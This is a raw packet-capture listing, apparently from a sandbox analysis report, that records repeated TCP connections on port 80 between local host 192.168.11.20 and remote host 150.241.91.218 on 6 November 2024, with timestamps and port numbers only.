                                                                                                                                                              Nov 6, 2024 17:35:42.411348104 CET4980480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.411348104 CET4980580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.412053108 CET4980580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.412053108 CET4980580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.602302074 CET8049805150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:42.602318048 CET8049805150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:42.683463097 CET8049805150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:42.697490931 CET4980580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.697911978 CET4980680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.885262012 CET8049805150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:42.885438919 CET8049806150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:42.885474920 CET4980580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.885617971 CET4980680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.885735989 CET4980680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.885735989 CET4980680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.074275970 CET8049806150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.074290991 CET8049806150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.154871941 CET8049806150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.179462910 CET4980680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.180068016 CET4980780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.379825115 CET8049807150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.379838943 CET8049806150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.380017996 CET4980680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.380017996 CET4980780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.380175114 CET4980780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.380175114 CET4980780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.567800999 CET8049807150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.567811012 CET8049807150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.631769896 CET8049807150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.649477959 CET4980780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.649976969 CET4980880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.837474108 CET8049807150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.837707043 CET4980780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.837719917 CET8049808150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:43.837980032 CET4980880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.838110924 CET4980880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:43.838110924 CET4980880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.025798082 CET8049808150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.025902987 CET8049808150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.094383955 CET8049808150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.109788895 CET4980880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.110238075 CET4980980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.297846079 CET8049808150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.297884941 CET8049809150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.298263073 CET4980880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.298263073 CET4980980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.298263073 CET4980980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.298263073 CET4980980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.487004995 CET8049809150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.487019062 CET8049809150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.556416988 CET8049809150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.568380117 CET4980980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.568886042 CET4981080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.759205103 CET8049809150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.759370089 CET8049810150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.759378910 CET4980980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.759624958 CET4981080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.759752989 CET4981080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.759802103 CET4981080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:44.948864937 CET8049810150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:44.948882103 CET8049810150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.022758961 CET8049810150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.046236038 CET4981080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.047373056 CET4981180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.235016108 CET8049810150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.235076904 CET8049811150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.235241890 CET4981080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.235241890 CET4981180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.235368967 CET4981180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.235368967 CET4981180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.423239946 CET8049811150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.423296928 CET8049811150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.493963957 CET8049811150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.505992889 CET4981180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.506473064 CET4981280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.694109917 CET8049811150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.694417000 CET4981180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.694645882 CET8049812150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.694863081 CET4981280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.695131063 CET4981280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.695131063 CET4981280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.883096933 CET8049812150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.883151054 CET8049812150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.950311899 CET8049812150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:45.963191986 CET4981280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:45.963629007 CET4981380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.151046038 CET8049812150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.151180029 CET4981280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.151401043 CET8049813150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.151638031 CET4981380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.151835918 CET4981380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.151835918 CET4981380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.339864016 CET8049813150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.339909077 CET8049813150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.408674955 CET8049813150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.419959068 CET4981380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.420547009 CET4981480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.608119011 CET8049813150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.608344078 CET4981380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.608820915 CET8049814150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.609046936 CET4981480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.609174967 CET4981480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.609174967 CET4981480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.797163010 CET8049814150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.797174931 CET8049814150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.874074936 CET8049814150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:46.891160965 CET4981480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:46.891588926 CET4981580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:47.079428911 CET8049814150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:47.079503059 CET8049815150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:47.079689026 CET4981480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:47.079689026 CET4981580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:47.079863071 CET4981580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:47.079863071 CET4981580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:47.267982960 CET8049815150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:47.268083096 CET8049815150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:48.351655960 CET8049815150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:48.367544889 CET4981580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:48.368052006 CET4981680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:48.555471897 CET8049815150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:48.555668116 CET8049816150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:48.555783987 CET4981580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:48.555932045 CET4981680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:48.556113958 CET4981680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:48.556113958 CET4981680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:48.743742943 CET8049816150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:48.743802071 CET8049816150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:48.813013077 CET8049816150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:48.823586941 CET4981680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:48.824001074 CET4981780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.011558056 CET8049816150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.011785030 CET4981680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.011841059 CET8049817150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.012032032 CET4981780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.012176991 CET4981780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.012238026 CET4981780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.200419903 CET8049817150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.200427055 CET8049817150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.271545887 CET8049817150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.284384966 CET4981780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.284836054 CET4981880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.472763062 CET8049817150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.472801924 CET8049818150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.473086119 CET4981780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.473086119 CET4981880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.473263979 CET4981880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.473263979 CET4981880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.661210060 CET8049818150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.661242008 CET8049818150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.730284929 CET8049818150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.741815090 CET4981880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.742283106 CET4981980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.930059910 CET8049818150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.930107117 CET8049819150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:49.930252075 CET4981880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.930342913 CET4981980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.930460930 CET4981980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:49.930460930 CET4981980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:50.118700981 CET8049819150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:50.118712902 CET8049819150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:50.187737942 CET8049819150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:50.207865953 CET4981980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:50.208326101 CET4982080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:50.395683050 CET8049819150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:50.395955086 CET4981980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:50.396112919 CET8049820150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:50.396306038 CET4982080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:50.396511078 CET4982080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:50.396511078 CET4982080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:50.584733009 CET8049820150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:50.584788084 CET8049820150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:50.952975988 CET8049820150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:50.965666056 CET4982080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:50.966411114 CET4982180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.154231071 CET8049820150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.154397964 CET4982080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.154952049 CET8049821150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.155126095 CET4982180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.155286074 CET4982180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.155286074 CET4982180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.343106031 CET8049821150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.343157053 CET8049821150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.409683943 CET8049821150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.422342062 CET4982180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.422808886 CET4982280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.611082077 CET8049822150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.611485958 CET4982280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.611485958 CET4982280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.611485958 CET4982280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.611676931 CET8049821150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.611830950 CET4982180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.799376011 CET8049822150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.799416065 CET8049822150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.868731022 CET8049822150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:51.879268885 CET4982280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:51.879698992 CET4982380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.067089081 CET8049822150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.067218065 CET4982280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.067840099 CET8049823150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.068146944 CET4982380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.068309069 CET4982380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.068309069 CET4982380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.256263971 CET8049823150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.256337881 CET8049823150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.325407028 CET8049823150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.340188026 CET4982380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.341037035 CET4982480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.529272079 CET8049823150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.529691935 CET4982380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.530343056 CET8049824150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.530670881 CET4982480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.530672073 CET4982480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.530672073 CET4982480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.719393015 CET8049824150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.719438076 CET8049824150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.791160107 CET8049824150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.807634115 CET4982480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.808100939 CET4982580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.996186018 CET8049824150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.996361971 CET4982480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.996639967 CET8049825150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:52.996809959 CET4982580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.996994019 CET4982580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:52.996994019 CET4982580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:53.185175896 CET8049825150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:53.185185909 CET8049825150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:53.253736019 CET8049825150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:53.302335024 CET4982580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:53.427745104 CET4982580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:53.428375959 CET4982680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:53.615950108 CET8049825150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:53.616291046 CET4982580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:53.616347075 CET8049826150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:53.616615057 CET4982680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:53.616652012 CET4982680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:53.616652012 CET4982680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:53.804784060 CET8049826150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:53.804816961 CET8049826150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:53.873851061 CET8049826150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:53.885092020 CET4982680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:53.885571957 CET4982780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.073117971 CET8049826150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.073371887 CET4982680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.073508978 CET8049827150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.073719025 CET4982780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.073868990 CET4982780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.073868990 CET4982780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.262078047 CET8049827150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.262108088 CET8049827150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.328439951 CET8049827150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.380245924 CET4982780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.505557060 CET4982780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.505965948 CET4982880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.693469048 CET8049827150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.693722010 CET4982780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.693826914 CET8049828150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.694045067 CET4982880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.694281101 CET4982880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.694282055 CET4982880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.882095098 CET8049828150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.882107973 CET8049828150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.950396061 CET8049828150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:54.964843988 CET4982880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:54.965286016 CET4982980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.153080940 CET8049828150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.153100967 CET8049829150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.153315067 CET4982980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.153315067 CET4982880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.153430939 CET4982980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.153430939 CET4982980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.341650963 CET8049829150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.341665983 CET8049829150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.410578966 CET8049829150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.422174931 CET4982980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.422481060 CET4983080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.610394955 CET8049829150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.610413074 CET8049830150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.610610962 CET4983080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.610613108 CET4982980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.610763073 CET4983080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.610763073 CET4983080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.799316883 CET8049830150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.799335003 CET8049830150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.868541002 CET8049830150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:55.879587889 CET4983080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:55.880033016 CET4983180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:56.067599058 CET8049830150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:56.067823887 CET4983080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:56.068206072 CET8049831150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:56.068407059 CET4983180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:56.068592072 CET4983180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:56.068593025 CET4983180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:56.256517887 CET8049831150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:56.256531954 CET8049831150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:56.325535059 CET8049831150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:56.337589979 CET4983180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:56.338135958 CET4983280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:56.525863886 CET8049831150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:56.525883913 CET8049832150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:56.526328087 CET4983180192.168.11.20150.241.91.218
